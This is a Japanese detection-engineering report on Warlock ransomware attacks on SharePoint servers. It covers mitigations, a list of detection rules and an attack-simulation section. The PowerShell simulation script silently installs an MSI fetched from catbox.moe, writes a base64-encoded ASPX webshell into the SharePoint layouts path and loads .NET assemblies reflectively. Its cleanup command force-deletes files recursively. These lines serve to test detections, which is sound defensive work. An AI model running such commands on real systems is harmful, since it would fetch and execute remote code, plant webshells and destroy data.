ウォーロックランサムウェアが重要な水道および通信インフラを攻撃
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
ロングレッグスと追跡される中国系の脅威アクターは、Microsoft SharePointの脆弱性を利用してWarlockランサムウェアを展開しています。このグループは、初回アクセスのためにToolShellのエクスプロイトチェーンを使用し、その後侵害されたネットワーク全体を横展開します。攻撃者は、セキュリティソフトを無効にするための脆弱なドライバーの悪用や、ペイロード配信に正規のクラウドサービスを利用するなど、高度な回避技術も適用しています。
調査
調査結果は、最初のSharePointエクスプロイトからLAYOUTSディレクトリ内へのwebshellの展開に至る活動を追跡しました。アナリストは、リモートコード実行に使用される偽のASP.NETマシンキーと、ドメイン全体に配布するためにSYSVOL共有に配置されたランサムウェアを観測しました。攻撃チェーンには、DLLのサイドロードとVisual Studio Codeのトンネリング機能の悪用による永続的なアクセスも含まれていました。
軽減策
組織は、Microsoft SharePoint Serverのパッチを優先して既知のToolShellの脆弱性を修正するべきです。署名済みであっても脆弱なドライバーに厳格な制御を施してBYOVD攻撃を防ぐことが可能です。セキュリティチームは、生存のためのランドツールの異常な使用の監視や、SYSVOL共有への非管理活動のアクセス制限を行い、横展開とランサムウェア展開を減少させるべきです。
対応
悪意のある活動が検出された際には、インシデント対応者は影響を受けたSharePointサーバを隔離し、SYSVOL共有での無許可のスクリプトやバイナリを調査すべきです。ドメインアカウントの包括的な監査を実施し、ローカル管理者グループへの無許可の追加に焦点を当てます。ペイロードのステージングに使用されるcatbox.moeやwasabisys.comなどのファイル共有サービスへの外部接続を確認するためにネットワークトラフィックをレビューします。
攻撃フロー
検出
ローカル管理者へのユーザー追加(コマンドライン経由)
Powershellを介したダウンロードまたはアップロード(コマンドライン経由)
疑わしいPowershell文字列(コマンドライン経由)
Powershellコマンドラインからの疑わしい.NETクラス/メソッドの呼び出し(プロセス作成経由)
ネットワーク共有の探索の可能性(コマンドライン経由)
疑わしいドメイントラストの探索(コマンドライン経由)
遠隔MSIファイルのインストール試行の可能性(コマンドライン経由)
公共ユーザープロファイルからの疑わしい実行(プロセス作成経由)
疑わしいPowershell文字列(powershell経由)
Powershellからの疑わしい.NETメソッドの呼び出し(powershell経由)
Microsoft Exchange / SharePointディレクトリでのWebシェル作成の可能性(ファイルイベント経由)
公共ユーザープロファイルの疑わしいファイル(ファイルイベント経由)
第三者サービス/ツールを介したデータの侵入/流出/C2の可能性(プロキシ経由)
第三者サービス/ツールを介したデータの侵入/流出/C2の可能性(DNS経由)
帯域外相互作用ドメインへのリクエストによる疑わしいコマンド&コントロール(DNS経由)
検出のためのIOC(HashSha256):水と通信事業者を標的とするWarlockランサムウェア攻撃者
コード実行のための悪意のあるPowerShellコマンドの検出[Windows Powershell]
Warlockランサムウェアのネットワーク共有経由のステージングと実行[Windowsファイルイベント]
SharePointサーバー上のWarlockランサムウェアのインジケータ[Windowsプロセス作成]
シミュレーションの実行
前提条件:テレメトリとベースラインの事前飛行チェックが合格していること。
理論的裏付け:このセクションでは、検出ルールをトリガーするために設計された具体的な攻撃者技術の実行を詳細に説明します。コマンドとナラティブは、特定されたTTPsを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目指す必要があります。抽象的または無関係な例は誤診につながります。
-
攻撃ナラティブとコマンド: 攻撃者は、SharePointサーバー上にWarlockランサムウェアを展開することを目指しています。攻撃は、次の方法で始まります:
msiexecを使用して、リモートの攻撃者制御ドメインから悪意のあるMSIを取得します(catbox.moe)。初期の足がかりを確立した後、攻撃者はPowerShellを使用して、SharePointのlayout2sp.aspxパスに悪意のあるASPXウェブシェルをベース64エンコードされたペイロードを使用して書き込むことで、簡単な文字列フィルターを回避します。最後に、攻撃者は、ディスク上にファイルの足跡を残さずにコードを実行するために、System.Workflow.ComponentModelを使用して悪意のある.NETアセンブリをメモリーに直接ロードすることを試みます。 -
回帰テストスクリプト:
# Warlockランサムウェアシミュレーションスクリプト # 注意:このスクリプトは承認済みのテスト目的のみに使用します。 Write-Host "[!] Warlockランサムウェアシミュレーションを開始します..." -ForegroundColor Red # 1. MSIEXECのリモートダウンロードをシミュレート(選択3) Write-Host "[*] MSIEXECリモートペイロードダウンロードをシミュレートしています..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. PowerShell ASPXウェブシェルドロップをシミュレート(選択1) # 検出を確実にするため、ルールからの正確な文字列を使用 Write-Host "[*] PowerShellを介したウェブシェルドロップをベース64でシミュレートしています..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. リフレクティブアセンブリロードをシミュレート(選択2) Write-Host "[*] リフレクティブアセンブリロードをシミュレートしています..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] シミュレーションコマンドが送信されました。" -ForegroundColor Green -
クリーンアップコマンド:
# シミュレーション中に作成されたアーティファクトを削除するクリーンアップスクリプト Write-Host "[!] シミュレーションアーティファクトをクリーンアップしています..." -ForegroundColor Yellow # シミュレートされたファイルを削除(注:実際のテストでは、作成された特定のパスを対象とします) # ダミーの文字列を使用したため、主に実際の悪意のあるファイルがドロップされていないことを確認します。 Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] クリーンアップ完了。" -ForegroundColor Green